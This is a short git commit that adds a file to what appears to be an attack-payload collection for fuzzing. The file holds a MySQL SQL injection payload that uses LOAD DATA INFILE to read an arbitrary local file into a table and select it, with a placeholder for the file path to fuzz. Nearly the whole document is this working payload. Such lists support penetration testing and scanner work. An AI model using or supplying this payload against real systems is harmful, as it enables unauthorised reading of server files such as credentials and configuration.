sqli attacks

2024-11-22 19:13:09 +00:00 · 2010-04-22 19:51:50 +00:00 · 2010-04-22 19:51:50 +00:00 · fe9b041b0d
commit fe9b041b0d
parent cb71ac1f2a
1 changed files with 3 additions and 0 deletions
--- a/attack-payloads/sql-injection/exploit/mysql-read-local-files.txt
+++ b/attack-payloads/sql-injection/exploit/mysql-read-local-files.txt
@ -0,0 +1,3 @@
+# mysql local file disclosure through sqli
+# fuzz interesting absolute filepath/filename into <filepath>
+create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;